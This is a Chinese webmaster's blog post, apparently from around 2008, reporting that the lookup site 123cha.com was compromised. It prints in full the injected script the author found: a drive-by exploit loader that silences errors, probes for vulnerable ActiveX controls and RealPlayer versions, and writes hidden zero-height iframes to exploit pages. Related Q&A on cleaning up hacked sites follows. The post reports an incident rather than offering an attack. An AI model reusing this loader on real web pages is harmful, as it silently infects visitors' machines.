123cha.com被黑 难道PHP也不安全了吗

欢迎您访问我爱IT技术网，今天小编为你分享的电脑教程是建站经验系列之：【123cha.com被黑 难道PHP也不安全了吗】，下面是详细的分享！

123cha.com被黑 难道PHP也不安全了吗

        现在是凌晨2点45分，作为一个草根站长的我还没有睡觉，应该凡是铁杆站长的应该现在都还没睡吧(废话)!

　　本来是要查自己刚注册的一个小游戏的网站域名解析是否生效了，所以就到123查询网查询了一下，结果令我吃惊的是出现的一片乱码，难道是我输入的网址输错了?结果仔细一看并没有输错啊。再查看一下代码，结果令我大吃一惊，PHP编写的123查询网居然被挂马了，难道除了ASP现在连PHP也不安全了吗?以我分析的话按理说123查询网流量这么大，在国内也算是数得着的一流站点了，怎么会出现这样的情况,难道是服务器安全问题吗?还是黑客找到了新的PHP漏洞?一连串的问题出现在我的脑海中!

　　123查询网被挂的是什么马?是哪位高人挂的啊，看了下代码被插入的马调用的(为了不让大家打开网页，害怕有毒，所以吧域名加了个*)nima12*.cn/zz.htm?a005 再打开这个页面后又是一个调用laoda123*.cn/web.htm，这个页面里的代码如下：

        <script>
        document.write("<iframe width=100 height=0 src=http://www.admin5.com/article/20081020/flash.htm></iframe>");
        document.write("<iframe width=100 height=0 src=http://www.admin5.com/article/20081020/xx.htm></iframe>");
        window.status="完成";
        window.onerror=function(){return true;}
        if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
        document.write("<iframe width=100 height=0 src=http://www.admin5.com/article/20081020/Ms06014.htm></iframe>");
        try{var m;
        var hw=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
        catch(m){};                     
        finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0

        src=http://www.admin5.com/article/20081020/office.htm></iframe>");}}
        try{var n;
        var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
        catch(n){};                     
        finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0

         src=http://www.admin5.com/article/20081020/UU.htm></iframe>");}}
         try{var b;
        var ml=new ActiveXObject("DPClient.Vod");}
        catch(b){};                     
        finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 

        src=http://www.admin5.com/article/20081020/Thunder.htm></iframe>");}}
        try{var f;
        var gw=new ActiveXObject("GLIEDown.IEDown.1");}
        catch(f){};                     
        finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0

        src=http://www.admin5.com/article/20081020/lz.htm></iframe>");}}
        function test()
        {
        rrooxx="IER" + "PCtl.I" + "ERP" + "Ctl.1";
        try
        {
        Like=new ActiveXObject(rrooxx);
        }catch(error){return;}
        vvvvv=Like.PlayerProperty("PRODUCTVERSION");
        if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
        document.write("<iframe width=100 height=0 src=http://www.admin5.com/article/20081020/real10.htm></iframe>");
        else
        document.write("<iframe width=100 height=0 src=http://www.admin5.com/article/20081020/Real11.htm></iframe>");
        }
        test();
        document.write("");
        </script>
 

        连环调用了好几个页面，估计是为了刷流量吧，或者有插件？123查询网的流量如此巨大，确实给黑客带去了不少东西呵呵。

        现在是凌晨3点40分，123查询网的站长还没做出反应，可能是不知道自己的站点除了问题，也可能是在积极调整服务器！

        我个人感觉大家都是中国人，兔子不吃窝边草，为什么有的高手非要破坏别人的网站呢？真诚的希望高手们一致对外，真的要搞破坏也不要拿自己人开刀！当然我说这句话可能有的黑客高手要不高兴了，不过我说的是实话，还希望各位高手下手之前先想一想，如果是自己的网站被黑了是什么感觉呢？让我们共同为中国的网络事业做出点贡献不好么？不要再让国外的一些人渣瞧不起了！

        在此祝你早日修复123查询网，因为我一直在用，应该是好多人都在用，希望贵站越办越好！

       

 

 

以上所分享的是关于123cha.com被黑 难道PHP也不安全了吗，下面是编辑为你推荐的有价值的用户互动：

　　相关问题：网站被黑了

　　答：先立即修改服务器管理密码，检查一下可以Discuz!可以上传文件的目录，比如attachment等，看看里面有没有php文件。如果没有，看一下这些多出来的文件的源码，如果是空文件可不必担心，一般是IIS或者Apache等自动生成的默认首页文件，如果里面是木... >>详细

　　相关问题：我的网站被人给黑了。东西全部泄露了，求大家叫我...

　　答：3 尽量选用PHP+MYSQL的程序,因为PHP语言比较新,比ASP...这样即使你服务器上的其他网站被黑,也不会牵连到你...领导者安全论坛 www.50hk.com 好了,以上就是我... >>详细

　　相关问题：为什么总有人说ASP不安全，难道它真的要被淘汰了吗？

　　答：很多人都说PHP,JAVA有前途,而且各大门户都是用PHP和JAVA做的 但我个人觉得,不论什么,它存在就有它的道理 我个人认为是ASP比较容易掌握,简单易学,而且开发速度快,还能找到非常多别人做好的程序来用，很多php做不到的asp+activeX能做到，例如银行... >>详细